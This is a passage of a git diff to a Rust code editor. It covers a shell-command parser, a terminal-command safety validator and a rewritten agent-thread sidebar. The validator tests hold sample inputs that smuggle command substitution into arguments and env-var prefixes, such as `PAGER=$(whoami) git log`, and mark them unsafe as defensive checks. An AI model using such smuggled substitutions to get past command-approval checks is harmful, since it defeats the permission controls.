@@ -117,12 +572,26 @@ fn extract_commands_from_simple_command( if let Some(prefix) = &simple_command.prefix { for item in &prefix.0 { - if let ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) = item { - match normalize_io_redirect(redirect) { - Some(RedirectNormalization::Normalized(s)) => redirects.push(s), - Some(RedirectNormalization::Skip) => {} - None => return None, + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => { + match normalize_io_redirect(redirect) { + Some(RedirectNormalization::Normalized(s)) => redirects.push(s), + Some(RedirectNormalization::Skip) => {} + None => return None, + } + } + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::Word(word) => { + words.push(normalize_word(word)?); } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => return None, } } } @@ -142,7 +611,15 @@ fn extract_commands_from_simple_command( None => return None, } } - _ => {} + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {} } } } @@ -1061,4 +1538,220 @@ mod tests { let commands = extract_commands("cmd > /tmp/out 2>/dev/null").expect("parse failed"); assert_eq!(commands, vec!["cmd", "> /tmp/out"]); } + + #[test] + fn test_scalar_env_var_prefix_included_in_extracted_command() { + let commands = extract_commands("PAGER=blah git status").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=blah git status"]); + } + + #[test] + fn test_multiple_scalar_assignments_preserved_in_order() { + let commands = extract_commands("A=1 B=2 git log").expect("parse failed"); + assert_eq!(commands, vec!["A=1 B=2 git log"]); + } + + #[test] + fn test_assignment_quoting_dropped_when_safe() { + let commands = extract_commands("PAGER='curl' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=curl git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_whitespace() { + let commands = extract_commands("PAGER='less -R' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='less -R' git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_semicolon() { + let commands = extract_commands("PAGER='a;b' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='a;b' git log"]); + } + + #[test] + fn test_array_assignments_ignored_for_prefix_matching_output() { + let commands = extract_commands("FOO=(a b) git status").expect("parse failed"); + assert_eq!(commands, vec!["git status"]); + } + + #[test] + fn test_extract_terminal_command_prefix_includes_env_var_prefix_and_subcommand() { + let prefix = extract_terminal_command_prefix("PAGER=blah git log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER=blah git log".to_string(), + display: "PAGER=blah git log".to_string(), + tokens: vec![ + "PAGER=blah".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_preserves_required_assignment_quotes_in_display_and_normalized() + { + let prefix = extract_terminal_command_prefix("PAGER='less -R' git log") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER='less -R' git log".to_string(), + display: "PAGER='less -R' git log".to_string(), + tokens: vec![ + "PAGER='less -R'".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_skips_redirects_before_subcommand() { + let prefix = extract_terminal_command_prefix("git 2>/dev/null log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "git log".to_string(), + display: "git 2>/dev/null log".to_string(), + tokens: vec!["git".to_string(), "log".to_string()], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_validate_terminal_command_rejects_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo $HOME"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_braced_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo ${HOME}"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_special_parameters() { + assert_eq!( + validate_terminal_command("echo $?"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $$"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $@"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_command_substitution() { + assert_eq!( + validate_terminal_command("echo $(whoami)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_backticks() { + assert_eq!( + validate_terminal_command("echo `whoami`"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_expansion() { + assert_eq!( + validate_terminal_command("echo $((1 + 1))"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_process_substitution() { + assert_eq!( + validate_terminal_command("cat <(ls)"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("ls >(cat)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_forbidden_constructs_in_env_var_assignments() { + assert_eq!( + validate_terminal_command("PAGER=$HOME git log"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("PAGER=$(whoami) git log"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_returns_unsupported_for_parse_failure() { + assert_eq!( + validate_terminal_command("echo $(ls &&)"), + TerminalCommandValidation::Unsupported + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_case_pattern() { + assert_ne!( + validate_terminal_command("case x in $(echo y)) echo z;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_safe_case_clause_without_substitutions() { + assert_eq!( + validate_terminal_command("case x in foo) echo hello;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_arithmetic_for_clause() { + assert_ne!( + validate_terminal_command("for ((i=$(echo 0); i<3; i++)); do echo hello; done"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_for_clause_unconditionally() { + assert_eq!( + validate_terminal_command("for ((i=0; i<3; i++)); do echo hello; done"), + TerminalCommandValidation::Unsafe + ); + } } diff --git a/crates/sidebar/Cargo.toml b/crates/sidebar/Cargo.toml index 6165a41c68894df9ad60110663562df713a24470..d76fd139557dd10438d7cf98f9168d87dcae9804 100644 --- a/crates/sidebar/Cargo.toml +++ b/crates/sidebar/Cargo.toml @@ -13,30 +13,51 @@ path = "src/sidebar.rs" [features] default = [] -test-support = [] [dependencies] acp_thread.workspace = true -agent_ui.workspace = true +action_log.workspace = true +agent.workspace = true +agent-client-protocol.workspace = true +agent_settings.workspace = true +agent_ui = { workspace = true, features = ["audio"] } +anyhow.workspace = true chrono.workspace = true +editor.workspace = true +feature_flags.workspace = true fs.workspace = true -fuzzy.workspace = true +git.workspace = true gpui.workspace = true -picker.workspace = true +menu.workspace = true +platform_title_bar.workspace = true project.workspace = true recent_projects.workspace = true +remote.workspace = true +serde.workspace = true +serde_json.workspace = true +settings.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true -ui_input.workspace = true util.workspace = true +vim_mode_setting.workspace = true workspace.workspace = true +zed_actions.workspace = true [dev-dependencies] +acp_thread = { workspace = true, features = ["test-support"] } +agent = { workspace = true, features = ["test-support"] } +agent_ui = { workspace = true, features = ["test-support"] } editor.workspace = true +language_model = { workspace = true, features = ["test-support"] } +pretty_assertions.workspace = true +prompt_store.workspace = true +recent_projects = { workspace = true, features = ["test-support"] } +serde_json.workspace = true feature_flags.workspace = true fs = { workspace = true, features = ["test-support"] } +git.workspace = true gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 24974512cda12276b5fcdc51ebd71d091782dff6..d6589361cd9417c2ac6d9025af92f1e096b341b1 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -1,1273 +1,4002 @@ -use acp_thread::ThreadStatus; -use agent_ui::{AgentPanel, AgentPanelEvent}; -use chrono::{Datelike, Local, NaiveDate, TimeDelta}; +mod thread_switcher; -use fs::Fs; -use fuzzy::StringMatchCandidate; +use acp_thread::ThreadStatus; +use action_log::DiffStats; +use agent_client_protocol::{self as acp}; +use agent_settings::AgentSettings; +use agent_ui::thread_metadata_store::{ThreadMetadata, ThreadMetadataStore}; +use agent_ui::threads_archive_view::{ + ThreadsArchiveView, ThreadsArchiveViewEvent, format_history_entry_timestamp, +}; +use agent_ui::{AcpThreadImportOnboarding, ThreadImportModal}; +use agent_ui::{ + Agent, AgentPanel, AgentPanelEvent, DEFAULT_THREAD_TITLE, NewThread, RemoveSelectedThread, +}; +use chrono::{DateTime, Utc}; +use editor::Editor; +use feature_flags::{AgentV2FeatureFlag, FeatureFlagViewExt as _}; use gpui::{ - App, Context, Entity, EventEmitter, FocusHandle, Focusable, Pixels, Render, SharedString, - Subscription, Task, Window, px, + Action as _, AnyElement, App, Context, Entity, FocusHandle, Focusable, KeyContext, ListState, + Pixels, Render, SharedString, WeakEntity, Window, WindowHandle, linear_color_stop, + linear_gradient, list, prelude::*, px, }; -use picker::{Picker, PickerDelegate}; -use project::Event as ProjectEvent; -use recent_projects::{RecentProjectEntry, get_recent_projects}; -use std::fmt::Display; +use menu::{ + Cancel, Confirm, SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious, +}; +use project::{ + AgentId, AgentRegistryStore, Event as ProjectEvent, ProjectGroupKey, linked_worktree_short_name, +}; +use recent_projects::sidebar_recent_projects::SidebarRecentProjects; +use remote::RemoteConnectionOptions; +use ui::utils::platform_title_bar_height; +use serde::{Deserialize, Serialize}; +use settings::Settings as _; use std::collections::{HashMap, HashSet}; - -use std::path::{Path, PathBuf}; -use std::sync::Arc; +use std::mem; +use std::rc::Rc; use theme::ActiveTheme; -use ui::utils::TRAFFIC_LIGHT_PADDING; use ui::{ - AgentThreadStatus, Divider, DividerColor, KeyBinding, ListSubHeader, Tab, ThreadItem, Tooltip, - prelude::*, + AgentThreadStatus, CommonAnimationExt, ContextMenu, Divider, HighlightedLabel, KeyBinding, + PopoverMenu, PopoverMenuHandle, Tab, ThreadItem, ThreadItemWorktreeInfo, TintColor, Tooltip, + WithScrollbar, prelude::*, }; -use ui_input::ErasedEditor; use util::ResultExt as _; +use util::path_list::{PathList, SerializedPathList}; use workspace::{ - FocusWorkspaceSidebar, MultiWorkspace, NewWorkspaceInWindow, Sidebar as WorkspaceSidebar, - SidebarEvent, ToggleWorkspaceSidebar, Workspace, + AddFolderToProject, CloseWindow, FocusWorkspaceSidebar, MultiWorkspace, MultiWorkspaceEvent, + Open, Sidebar as WorkspaceSidebar, SidebarSide, ToggleWorkspaceSidebar, Workspace, WorkspaceId, + sidebar_side_context_menu, }; -#[derive(Clone, Debug)] -struct AgentThreadInfo { - title: SharedString, - status: AgentThreadStatus, - icon: IconName, -} +use zed_actions::OpenRecent; +use zed_actions::editor::{MoveDown, MoveUp}; -const DEFAULT_WIDTH: Pixels = px(320.0); +use zed_actions::agents_sidebar::{FocusSidebarFilter, ToggleThreadSwitcher}; + +use crate::thread_switcher::{ThreadSwitcher, ThreadSwitcherEntry, ThreadSwitcherEvent}; + +#[cfg(test)] +mod sidebar_tests; + +gpui::actions!( + agents_sidebar, + [ + /// Creates a new thread in the currently selected or active project group. + NewThreadInGroup, + /// Toggles between the thread list and the archive view. + ToggleArchive, + ] +); + +gpui::actions!( + dev, + [ + /// Dumps multi-workspace state (projects, worktrees, active threads) into a new buffer. + DumpWorkspaceInfo, + ] +); + +const DEFAULT_WIDTH: Pixels = px(300.0); const MIN_WIDTH: Pixels = px(200.0); const MAX_WIDTH: Pixels = px(800.0); -const MAX_MATCHES: usize = 100; +const DEFAULT_THREADS_SHOWN: usize = 5; -#[derive(Clone)] -struct WorkspaceThreadEntry { - index: usize, - worktree_label: SharedString, - full_path: SharedString, - thread_info: Option, +#[derive(Default, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] +enum SerializedSidebarView { + #[default] + ThreadList, + Archive, } -impl WorkspaceThreadEntry { - fn new(index: usize, workspace: &Entity, cx: &App) -> Self { - let workspace_ref = workspace.read(cx); - - let worktrees: Vec<_> = workspace_ref - .worktrees(cx) - .filter(|worktree| worktree.read(cx).is_visible()) - .map(|worktree| worktree.read(cx).abs_path()) - .collect(); +#[derive(Default, Serialize, Deserialize)] +struct SerializedSidebar { + #[serde(default)] + width: Option, + #[serde(default)] + collapsed_groups: Vec, + #[serde(default)] + expanded_groups: Vec<(SerializedPathList, usize)>, + #[serde(default)] + active_view: SerializedSidebarView, +} - let worktree_names: Vec = worktrees - .iter() - .filter_map(|path| { - path.file_name() - .map(|name| name.to_string_lossy().to_string()) - }) - .collect(); +#[derive(Debug, Default)] +enum SidebarView { + #[default] + ThreadList, + Archive(Entity), +} - let worktree_label: SharedString = if worktree_names.is_empty() { - format!("Workspace {}", index + 1).into() - } else { - worktree_names.join(", ").into() - }; +#[derive(Clone, Debug)] +enum ActiveEntry { + Thread { + session_id: acp::SessionId, + workspace: Entity, + }, + Draft(Entity), +} - let full_path: SharedString = worktrees - .iter() - .map(|path| path.to_string_lossy().to_string()) - .collect::>() - .join("\n") - .into(); +impl ActiveEntry { + fn workspace(&self) -> &Entity { + match self { + ActiveEntry::Thread { workspace, .. } => workspace, + ActiveEntry::Draft(workspace) => workspace, + } + } - let thread_info = Self::thread_info(workspace, cx); + fn is_active_thread(&self, session_id: &acp::SessionId) -> bool { + matches!(self, ActiveEntry::Thread { session_id: id, .. } if id == session_id) + } - Self { - index, - worktree_label, - full_path, - thread_info, + fn matches_entry(&self, entry: &ListEntry) -> bool { + match (self, entry) { + (ActiveEntry::Thread { session_id, .. }, ListEntry::Thread(thread)) => { + thread.metadata.session_id == *session_id + } + (ActiveEntry::Draft(_workspace), ListEntry::DraftThread { .. }) => true, + _ => false, } } +} - fn thread_info(workspace: &Entity, cx: &App) -> Option { - let agent_panel = workspace.read(cx).panel::(cx)?; - let agent_panel_ref = agent_panel.read(cx); +#[derive(Clone, Debug)] +struct ActiveThreadInfo { + session_id: acp::SessionId, + title: SharedString, + status: AgentThreadStatus, + icon: IconName, + icon_from_external_svg: Option, + is_background: bool, + is_title_generating: bool, + diff_stats: DiffStats, +} - let thread_view = agent_panel_ref.as_active_thread_view(cx)?.read(cx); - let thread = thread_view.thread.read(cx); +#[derive(Clone)] +enum ThreadEntryWorkspace { + Open(Entity), + Closed(PathList), +} - let icon = thread_view.agent_icon; - let title = thread.title(); +#[derive(Clone)] +struct WorktreeInfo { + name: SharedString, + full_path: SharedString, + highlight_positions: Vec, +} - let status = if thread.is_waiting_for_confirmation() { - AgentThreadStatus::WaitingForConfirmation - } else if thread.had_error() { - AgentThreadStatus::Error - } else { - match thread.status() { - ThreadStatus::Generating => AgentThreadStatus::Running, - ThreadStatus::Idle => AgentThreadStatus::Completed, - } - }; - Some(AgentThreadInfo { - title, - status, - icon, - }) +#[derive(Clone)] +struct ThreadEntry { + metadata: ThreadMetadata, + icon: IconName, + icon_from_external_svg: Option, + status: AgentThreadStatus, + workspace: ThreadEntryWorkspace, + is_live: bool, + is_background: bool, + is_title_generating: bool, + highlight_positions: Vec, + worktrees: Vec, + diff_stats: DiffStats, +} + +impl ThreadEntry { + /// Updates this thread entry with active thread information. + /// + /// The existing [`ThreadEntry`] was likely deserialized from the database + /// but if we have a correspond thread already loaded we want to apply the + /// live information. + fn apply_active_info(&mut self, info: &ActiveThreadInfo) { + self.metadata.title = info.title.clone(); + self.status = info.status; + self.icon = info.icon; + self.icon_from_external_svg = info.icon_from_external_svg.clone(); + self.is_live = true; + self.is_background = info.is_background; + self.is_title_generating = info.is_title_generating; + self.diff_stats = info.diff_stats; } } #[derive(Clone)] -enum SidebarEntry { - Separator(SharedString), - WorkspaceThread(WorkspaceThreadEntry), - RecentProject(RecentProjectEntry), +enum ListEntry { + ProjectHeader { + key: ProjectGroupKey, + label: SharedString, + highlight_positions: Vec, + has_running_threads: bool, + waiting_thread_count: usize, + is_active: bool, + }, + Thread(ThreadEntry), + ViewMore { + key: ProjectGroupKey, + is_fully_expanded: bool, + }, + /// The user's active draft thread. Shows a prefix of the currently-typed + /// prompt, or "Untitled Thread" if the prompt is empty. + DraftThread { + worktrees: Vec, + }, + /// A convenience row for starting a new thread. Shown when a project group + /// has no threads, or when the active workspace contains linked worktrees + /// with no threads for that specific worktree set. + NewThread { + key: project::ProjectGroupKey, + worktrees: Vec, + }, } -impl SidebarEntry { - fn searchable_text(&self) -> &str { +#[cfg(test)] +impl ListEntry { + fn session_id(&self) -> Option<&acp::SessionId> { match self { - SidebarEntry::Separator(_) => "", - SidebarEntry::WorkspaceThread(entry) => entry.worktree_label.as_ref(), - SidebarEntry::RecentProject(entry) => entry.name.as_ref(), + ListEntry::Thread(thread_entry) => Some(&thread_entry.metadata.session_id), + _ => None, } } } -#[derive(Clone)] -struct SidebarMatch { - entry: SidebarEntry, - positions: Vec, +impl From for ListEntry { + fn from(thread: ThreadEntry) -> Self { + ListEntry::Thread(thread) + } } -struct WorkspacePickerDelegate { - multi_workspace: Entity, - entries: Vec, - active_workspace_index: usize, - workspace_thread_count: usize, - /// All recent projects including what's filtered out of entries - /// used to add unopened projects to entries on rebuild - recent_projects: Vec, - recent_project_thread_titles: HashMap, - matches: Vec, - selected_index: usize, - query: String, - hovered_thread_item: Option, - notified_workspaces: HashSet, +#[derive(Default)] +struct SidebarContents { + entries: Vec, + notified_threads: HashSet, + project_header_indices: Vec, + has_open_projects: bool, } -impl WorkspacePickerDelegate { - fn new(multi_workspace: Entity) -> Self { - Self { - multi_workspace, - entries: Vec::new(), - active_workspace_index: 0, - workspace_thread_count: 0, - recent_projects: Vec::new(), - recent_project_thread_titles: HashMap::new(), - matches: Vec::new(), - selected_index: 0, - query: String::new(), - hovered_thread_item: None, - notified_workspaces: HashSet::new(), - } +impl SidebarContents { + fn is_thread_notified(&self, session_id: &acp::SessionId) -> bool { + self.notified_threads.contains(session_id) } +} - fn set_entries( - &mut self, - workspace_threads: Vec, - active_workspace_index: usize, - cx: &App, - ) { - if let Some(hovered_index) = self.hovered_thread_item { - let still_exists = workspace_threads - .iter() - .any(|thread| thread.index == hovered_index); - if !still_exists { - self.hovered_thread_item = None; - } - } - - let old_statuses: HashMap = self - .entries - .iter() - .filter_map(|entry| match entry { - SidebarEntry::WorkspaceThread(thread) => thread - .thread_info - .as_ref() - .map(|info| (thread.index, info.status)), - _ => None, - }) - .collect(); +fn fuzzy_match_positions(query: &str, candidate: &str) -> Option> { + let mut positions = Vec::new(); + let mut query_chars = query.chars().peekable(); - for thread in &workspace_threads { - if let Some(info) = &thread.thread_info { - if info.status == AgentThreadStatus::Completed - && thread.index != active_workspace_index - { - if old_statuses.get(&thread.index) == Some(&AgentThreadStatus::Running) { - self.notified_workspaces.insert(thread.index); - } - } + for (byte_idx, candidate_char) in candidate.char_indices() { + if let Some(&query_char) = query_chars.peek() { + if candidate_char.eq_ignore_ascii_case(&query_char) { + positions.push(byte_idx); + query_chars.next(); } + } else { + break; } - - if self.active_workspace_index != active_workspace_index { - self.notified_workspaces.remove(&active_workspace_index); - } - self.active_workspace_index = active_workspace_index; - self.workspace_thread_count = workspace_threads.len(); - self.rebuild_entries(workspace_threads, cx); } - fn set_recent_projects(&mut self, recent_projects: Vec, cx: &App) { - self.recent_project_thread_titles.clear(); - - self.recent_projects = recent_projects; - - let workspace_threads: Vec = self - .entries - .iter() - .filter_map(|entry| match entry { - SidebarEntry::WorkspaceThread(thread) => Some(thread.clone()), - _ => None, - }) - .collect(); - self.rebuild_entries(workspace_threads, cx); + if query_chars.peek().is_none() { + Some(positions) + } else { + None } +} - fn open_workspace_path_sets(&self, cx: &App) -> Vec>> { - self.multi_workspace - .read(cx) - .workspaces() +// TODO: The mapping from workspace root paths to git repositories needs a +// unified approach across the codebase: this function, `AgentPanel::classify_worktrees`, +// thread persistence (which PathList is saved to the database), and thread +// querying (which PathList is used to read threads back). All of these need +// to agree on how repos are resolved for a given workspace, especially in +// multi-root and nested-repo configurations. +fn root_repository_snapshots( + workspace: &Entity, + cx: &App, +) -> impl Iterator { + let path_list = workspace_path_list(workspace, cx); + let project = workspace.read(cx).project().read(cx); + project.repositories(cx).values().filter_map(move |repo| { + let snapshot = repo.read(cx).snapshot(); + let is_root = path_list + .paths() .iter() - .map(|workspace| { - let mut paths = workspace.read(cx).root_paths(cx); - paths.sort(); - paths - }) - .collect() - } - - fn rebuild_entries(&mut self, workspace_threads: Vec, cx: &App) { - let open_path_sets = self.open_workspace_path_sets(cx); + .any(|p| p.as_path() == snapshot.work_directory_abs_path.as_ref()); + is_root.then_some(snapshot) + }) +} - self.entries.clear(); +fn workspace_path_list(workspace: &Entity, cx: &App) -> PathList { + PathList::new(&workspace.read(cx).root_paths(cx)) +} - if !workspace_threads.is_empty() { - self.entries - .push(SidebarEntry::Separator("Active Workspaces".into())); - for thread in workspace_threads { - self.entries.push(SidebarEntry::WorkspaceThread(thread)); +/// Derives worktree display info from a thread's stored path list. +/// +/// For each path in the thread's `folder_paths` that is not one of the +/// group's main paths (i.e. it's a git linked worktree), produces a +/// [`WorktreeInfo`] with the short worktree name and full path. +fn worktree_info_from_thread_paths( + folder_paths: &PathList, + group_key: &project::ProjectGroupKey, +) -> Vec { + let main_paths = group_key.path_list().paths(); + folder_paths + .paths() + .iter() + .filter_map(|path| { + if main_paths.iter().any(|mp| mp.as_path() == path.as_path()) { + return None; } - } - - let recent: Vec<_> = self - .recent_projects - .iter() - .filter(|project| { - let mut project_paths: Vec<&Path> = - project.paths.iter().map(|p| p.as_path()).collect(); - project_paths.sort(); - !open_path_sets.iter().any(|open_paths| { - open_paths.len() == project_paths.len() - && open_paths - .iter() - .zip(&project_paths) - .all(|(a, b)| a.as_ref() == *b) - }) + // Find the main path whose file name matches this linked + // worktree's file name, falling back to the first main path. + let main_path = main_paths + .iter() + .find(|mp| mp.file_name() == path.file_name()) + .or(main_paths.first())?; + Some(WorktreeInfo { + name: linked_worktree_short_name(main_path, path).unwrap_or_default(), + full_path: SharedString::from(path.display().to_string()), + highlight_positions: Vec::new(), }) - .cloned() - .collect(); + }) + .collect() +} - if !recent.is_empty() { - let today = Local::now().naive_local().date(); - let mut current_bucket: Option = None; +/// The sidebar re-derives its entire entry list from scratch on every +/// change via `update_entries` → `rebuild_contents`. Avoid adding +/// incremental or inter-event coordination state — if something can +/// be computed from the current world state, compute it in the rebuild. +pub struct Sidebar { + multi_workspace: WeakEntity, + width: Pixels, + focus_handle: FocusHandle, + filter_editor: Entity, + list_state: ListState, + contents: SidebarContents, + /// The index of the list item that currently has the keyboard focus + /// + /// Note: This is NOT the same as the active item. + selection: Option, + /// Tracks which sidebar entry is currently active (highlighted). + active_entry: Option, + hovered_thread_index: Option, + collapsed_groups: HashSet, + expanded_groups: HashMap, + /// Updated only in response to explicit user actions (clicking a + /// thread, confirming in the thread switcher, etc.) — never from + /// background data changes. Used to sort the thread switcher popup. + thread_last_accessed: HashMap>, + /// Updated when the user presses a key to send or queue a message. + /// Used for sorting threads in the sidebar and as a secondary sort + /// key in the thread switcher. + thread_last_message_sent_or_queued: HashMap>, + thread_switcher: Option>, + _thread_switcher_subscriptions: Vec, + view: SidebarView, + recent_projects_popover_handle: PopoverMenuHandle, + project_header_menu_ix: Option, + _subscriptions: Vec, + _draft_observation: Option, +} - for project in recent { - let entry_date = project.timestamp.with_timezone(&Local).naive_local().date(); - let bucket = TimeBucket::from_dates(today, entry_date); +impl Sidebar { + pub fn new( + multi_workspace: Entity, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let focus_handle = cx.focus_handle(); + cx.on_focus_in(&focus_handle, window, Self::focus_in) + .detach(); + + let filter_editor = cx.new(|cx| { + let mut editor = Editor::single_line(window, cx); + editor.set_use_modal_editing(true); + editor.set_placeholder_text("Search…", window, cx); + editor + }); - if current_bucket != Some(bucket) { - current_bucket = Some(bucket); - self.entries - .push(SidebarEntry::Separator(bucket.to_string().into())); + cx.subscribe_in( + &multi_workspace, + window, + |this, _multi_workspace, event: &MultiWorkspaceEvent, window, cx| match event { + MultiWorkspaceEvent::ActiveWorkspaceChanged => { + this.observe_draft_editor(cx); + this.update_entries(cx); + } + MultiWorkspaceEvent::WorkspaceAdded(workspace) => { + this.subscribe_to_workspace(workspace, window, cx); + this.update_entries(cx); + } + MultiWorkspaceEvent::WorkspaceRemoved(_) => { + this.update_entries(cx); + } + }, + ) + .detach(); + + cx.subscribe(&filter_editor, |this: &mut Self, _, event, cx| { + if let editor::EditorEvent::BufferEdited = event { + let query = this.filter_editor.read(cx).text(cx); + if !query.is_empty() { + this.selection.take(); + } + this.update_entries(cx); + if !query.is_empty() { + this.select_first_entry(); } - - self.entries.push(SidebarEntry::RecentProject(project)); } - } - } -} - -#[derive(Clone, Copy, Debug, PartialEq, Eq)] -enum TimeBucket { - Today, - Yesterday, - ThisWeek, - PastWeek, - All, -} + }) + .detach(); -impl TimeBucket { - fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self { - if date == reference { - return TimeBucket::Today; - } + cx.observe(&ThreadMetadataStore::global(cx), |this, _store, cx| { + this.update_entries(cx); + }) + .detach(); - if date == reference - TimeDelta::days(1) { - return TimeBucket::Yesterday; - } + cx.observe_flag::(window, |_is_enabled, this, _window, cx| { + this.update_entries(cx); + }) + .detach(); - let week = date.iso_week(); + let workspaces: Vec<_> = multi_workspace.read(cx).workspaces().cloned().collect(); + cx.defer_in(window, move |this, window, cx| { + for workspace in &workspaces { + this.subscribe_to_workspace(workspace, window, cx); + } + this.update_entries(cx); + }); - if reference.iso_week() == week { - return TimeBucket::ThisWeek; + Self { + multi_workspace: multi_workspace.downgrade(), + width: DEFAULT_WIDTH, + focus_handle, + filter_editor, + list_state: ListState::new(0, gpui::ListAlignment::Top, px(1000.)), + contents: SidebarContents::default(), + selection: None, + active_entry: None, + hovered_thread_index: None, + collapsed_groups: HashSet::new(), + expanded_groups: HashMap::new(), + thread_last_accessed: HashMap::new(), + thread_last_message_sent_or_queued: HashMap::new(), + thread_switcher: None, + _thread_switcher_subscriptions: Vec::new(), + view: SidebarView::default(), + recent_projects_popover_handle: PopoverMenuHandle::default(), + project_header_menu_ix: None, + _subscriptions: Vec::new(), + _draft_observation: None, } + } - let last_week = (reference - TimeDelta::days(7)).iso_week(); - - if week == last_week { - return TimeBucket::PastWeek; - } + fn serialize(&mut self, cx: &mut Context) { + cx.emit(workspace::SidebarEvent::SerializeNeeded); + } - TimeBucket::All + fn active_entry_workspace(&self) -> Option<&Entity> { + self.active_entry.as_ref().map(|entry| entry.workspace()) } -} -impl Display for TimeBucket { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - TimeBucket::Today => write!(f, "Today"), - TimeBucket::Yesterday => write!(f, "Yesterday"), - TimeBucket::ThisWeek => write!(f, "This Week"), - TimeBucket::PastWeek => write!(f, "Past Week"), - TimeBucket::All => write!(f, "All"), - } + fn is_active_workspace(&self, workspace: &Entity, cx: &App) -> bool { + self.multi_workspace + .upgrade() + .map_or(false, |mw| mw.read(cx).workspace() == workspace) } -} -fn open_recent_project(paths: Vec, window: &mut Window, cx: &mut App) { - let Some(handle) = window.window_handle().downcast::() else { - return; - }; + fn subscribe_to_workspace( + &mut self, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let project = workspace.read(cx).project().clone(); + cx.subscribe_in( + &project, + window, + |this, _project, event, _window, cx| match event { + ProjectEvent::WorktreeAdded(_) + | ProjectEvent::WorktreeRemoved(_) + | ProjectEvent::WorktreeOrderChanged => { + this.update_entries(cx); + } + _ => {} + }, + ) + .detach(); - cx.defer(move |cx| { - if let Some(task) = handle - .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(paths, window, cx) - }) - .log_err() - { - task.detach_and_log_err(cx); - } - }); -} + let git_store = workspace.read(cx).project().read(cx).git_store().clone(); + cx.subscribe_in( + &git_store, + window, + |this, _, event: &project::git_store::GitStoreEvent, _window, cx| { + if matches!( + event, + project::git_store::GitStoreEvent::RepositoryUpdated( + _, + project::git_store::RepositoryEvent::GitWorktreeListChanged, + _, + ) + ) { + this.update_entries(cx); + } + }, + ) + .detach(); -impl PickerDelegate for WorkspacePickerDelegate { - type ListItem = AnyElement; + cx.subscribe_in( + workspace, + window, + |this, _workspace, event: &workspace::Event, window, cx| { + if let workspace::Event::PanelAdded(view) = event { + if let Ok(agent_panel) = view.clone().downcast::() { + this.subscribe_to_agent_panel(&agent_panel, window, cx); + } + } + }, + ) + .detach(); - fn match_count(&self) -> usize { - self.matches.len() - } + self.observe_docks(workspace, cx); - fn selected_index(&self) -> usize { - self.selected_index + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + self.subscribe_to_agent_panel(&agent_panel, window, cx); + self.observe_draft_editor(cx); + } } - fn set_selected_index( + fn subscribe_to_agent_panel( &mut self, - ix: usize, - _window: &mut Window, - _cx: 